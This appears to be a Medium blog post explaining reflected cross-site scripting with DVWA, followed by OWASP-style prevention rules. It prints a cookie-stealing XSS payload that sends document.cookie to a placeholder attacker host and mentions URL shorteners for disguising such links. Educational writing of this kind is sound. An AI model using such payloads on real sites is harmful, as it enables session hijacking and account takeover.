SecureBit
Published in

SecureBit

Why a user-controlled pop-up is vulnerable?

Have you ever encountered the question, that why a simple pop-up^, that could be controlled by a user, makes an application vulnerable? What is the real fuss about a mere pop-up? Indeed it’s just a pop-up, what harm it can do? We, of course, encounter several pop-ups while browsing a website, what difference does it make, if it could be controlled by you, right? What exactly is the real logic behind this scenario?

DVWA- Vulnerable to Reflected XSS

The above image shows a simple popup saying “test”, that was created while testing the DVWA. Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable and available for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment. This was an exercise in DVWA- XSS reflected. You can further explore the DVWA Web Application for other web-based vulnerabilities, by installing it for the GitHub repository- digininja/DVWA.

In this article, we’ll be discussing the real, nitty-gritty behind the question: Why a user-controlled pop-up is vulnerable?

Let’s first understand the functionality of browsers, you know them right, they are feeble and could be so unpredictable. So, here’s the deal, the browser will only execute those “javascript” codes, that are originated from your website’s domain, say: “https://yourweb.com/", due to application’s “same-origin policy”., ie., they’ll only do that, what they are forced to do. Remember the HTTP Headers in request-response?

Test Scenario: In the above case of a popup, what exactly happened is that a lone browser was merely going on fetching and processing the HTML- CSS, javascript or whatsoever codes you put in your application (here, DVWA), to display the page as adorable as possible. Trust me, he is obsessed with his work. But in quest of that, he was lost and robbed. As he encountered the <script></script> tag (decoy bandits) in his HTML, it stopped, halted the further processing for HTML and went away looking for script files, he was directed to search for (doing as ordered by bandits, of course, what else you could have done). So, as he fetched and processed the javascript code hidden in <script> tags. He encountered an alert statement (hands up, handover the money) and executed the contents inside that method. Here, he was ordered to take away the focus of the user to a different page and displayed the message “test” (it could be anything, you’ll see). After this, the feeble browser runs away as far as possible and goes back rendering the HTML it was looking for, but with a heavy heart and fewer jingles in his pocket. And just to inform, it happened like real quick.

Code looked like something: <script>alert(“test”)</script>

Conclusion: the browser is an idiot, he will go ahead and look for your domain name in the request. If he founds that, you, the master, are ordering him to do a task. Yes, he’ll just do it. ✔

So, as said, the website is vulnerable to XSS, rather a Reflected XSS, also known as First Order XSS (say, a user-controlled pop-up, okay I give up, no more nomenclature now), the attacker can make a malicious request like*:

Evil Code: “https://yourweb.com/somepage.ex?vulnerbleparameter=<script>var+x=new+Image;+x.src="https://attackerweb.com/"%2bdocument.cookie;</script>"

Did you notice what I just did there? Let me explain, the actions taken are-

  1. redirection to the attacker’s website: “https://attackerweb.com/"
  2. theft of cookie generated by your website
  3. and lastly, grief for your pity soul, your session is mine.

Code decoded: var x= new Image; i.src=”https://attackerweb.com/"+document.cookie;

You can understand the above-decoded part right? So, further, a stolen cookie could be used to authenticate a session on your website that can grant the attacker full access to your account over the website.

  • Note: Action Required- a logged-in victim (here, you) needs to be tricked, to click the malicious link, which is a no bar, as you (I don’t trust anyone) easily trust unknown URLs. Moreover, the request seems legit, as it is originated from a trusted website (https://yourwebsite.com/). Also, URL shorteners, like Bit.ly, free Url Shortener, etc could be used to make the link appealing.

^What actually is a pop-up?

Just a javascript code, placed on your website, that is executed by the browser, when you order it to. So, if a javascript on your website could be controlled by the user. You now know, what harm it can do.

So, now, the Remediation-

What can you do?

  • Firstly, do not fall for social engineering gimmicks. Do not click the unknown URL/images/kitty faces/yes, all the other unknowns (I repeat do not or what just leave it, go ahead, I’m no one to speak for you, well its all yours).
  • If you really have to check your account, go to the original website, authenticate & make the required changes. Yeah, you heard me. Always validate, look where you are going. In case of code red, try ctrl + z, abort the task (and pray it works)
  • On a serious note, to prevent XSS in your website, follow below rules:
  1. Never Insert Untrusted Data Except in Allowed Locations
  2. HTML Encode Before Inserting Untrusted Data into HTML Element Content
  3. Attribute Encode Before Inserting Untrusted Data into HTML Common Attributes
  4. JavaScript Encode Before Inserting Untrusted Data into JavaScript Data Values
  5. CSS Encode And Strictly Validate Before Inserting Untrusted Data into HTML Style Property Values
  6. URL Encode Before Inserting Untrusted Data into HTML URL Parameter Values
  7. Sanitize HTML Markup with a Library Designed for the Job
  8. Avoid JavaScript URLs
  9. Properly use modern JS frameworks
  10. Implement- X-XSS-Protection Header

For more info, don’t forget to refer to: OWASP XSS CheatSheet.

I know what you are thinking, an unknown link at the end of the post. No, I’m not doing any gimmicks on you. You can trust me (or not, evil laughs). Did you get that? 👾

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
goswamiijaya

goswamiijaya

Cyber Security Consultant-Deloitte | CEH | Cyber Threat Intelligence (CTI) | VAPT